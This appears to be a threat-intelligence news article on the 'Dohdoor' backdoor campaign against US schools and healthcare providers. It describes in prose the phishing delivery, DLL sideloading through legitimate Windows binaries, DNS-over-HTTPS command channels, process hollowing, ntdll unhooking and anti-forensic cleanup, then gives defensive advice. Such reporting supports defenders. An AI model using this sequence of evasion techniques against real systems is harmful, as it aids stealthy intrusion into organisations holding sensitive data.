A sophisticated new malware campaign, dubbed “Dohdoor,” is actively targeting U.S. educational and healthcare organizations. Since at least December 2025, threat actor UAT-10027 has been deploying this previously unknown backdoor malware, utilizing advanced stealth and multi-stage delivery tactics to achieve persistent access. The emergence of Dohdoor highlights a concerning trend of advanced threat actors targeting sectors handling sensitive data often with limited cybersecurity resources.
The malware’s name is derived from its use of DNS-over-HTTPS (DoH) for command-and-control (C2) communications, transforming a legitimate internet protocol into a covert channel. By routing its C2 traffic through Cloudflare’s encrypted DNS infrastructure, Dohdoor disguises its outbound communications as normal HTTPS traffic. This, combined with deceptive subdomain names like “MswInSofTUpDloAd” and irregular capitalization in non-standard top-level domains, aids in bypassing automated security filters.
Inside the Dohdoor Malware Attack Chain
Cisco Talos researchers have been tracking this unfolding campaign, attributing it to UAT-10027. The threat actor leverages legitimate Windows executables, known as living-off-the-land binaries (LOLBins), to sideload the Dohdoor malware onto compromised systems. The campaign’s infrastructure is designed for anonymity, with C2 servers concealed behind Cloudflare’s network, making interception and blocking more challenging for defenders. Suspicious download telemetry first alerted Talos to this ongoing intrusion pattern specifically targeting the education and healthcare sectors.
The initial infection vector is believed to be phishing emails delivering a PowerShell script. Upon execution, this script utilizes the `curl.exe` utility with an encoded URL to download a malicious Windows batch file (`.bat` or `.cmd`) from a remote staging server. This initiates a carefully orchestrated, multi-stage infection process designed to minimize detection at each step.
The Multi-Stage Infection Mechanism
The batch script serves a dual purpose as both a dropper and a cleanup tool. It creates a hidden working folder, typically in `C:ProgramData` or `C:UsersPublic`, and then downloads a malicious DLL. This DLL is disguised with names resembling legitimate system files, such as `propsys.dll` or `batmeter.dll`. Subsequently, it copies legitimate Windows executables like `Fondue.exe` and `mblctr.exe` into this working folder.
These legitimate executables are then used to sideload and execute the malicious DLL through a technique known as DLL sideloading. Once the malware is active, the batch script meticulously erases its own tracks. This includes clearing Run command history from the `RunMRU` registry key, purging clipboard data, and deleting itself entirely, employing anti-forensic cleanup tactics.
With Dohdoor operational, it resolves its C2 server’s IP address through encrypted DNS queries over HTTPS port 443, receiving JSON responses containing the necessary IP data. Following this, it downloads an encrypted payload. This payload is decrypted using a custom XOR-SUB algorithm with a position-dependent cipher before being injected into legitimate Windows processes like `OpenWith.exe` and `wab.exe` via process hollowing. This sophisticated technique helps the malware evade detection by endpoint detection and response (EDR) tools.
To further evade security measures, Dohdoor actively patches system call stubs within `ntdll.dll`, effectively removing monitoring hooks that security products rely on. Evidence gathered by Cisco Talos suggests that the final payload is likely a Cobalt Strike Beacon, indicated by matching JA3S hash signatures found within the C2 infrastructure.
While Cisco Talos assesses with low confidence that UAT-10027 may have connections to North Korea’s Lazarus Group, this assessment is based on overlapping decryption techniques, NTDLL unhooking methods, and observed domain naming patterns. Organizations within the education and healthcare sectors are strongly advised to implement robust security measures. These include blocking suspicious LOLBin activity, monitoring for anomalous HTTPS traffic, and deploying DNS security controls capable of inspecting DoH traffic. The application of specific ClamAV signatures and Snort rules can further aid in the detection and blocking of this evolving threat.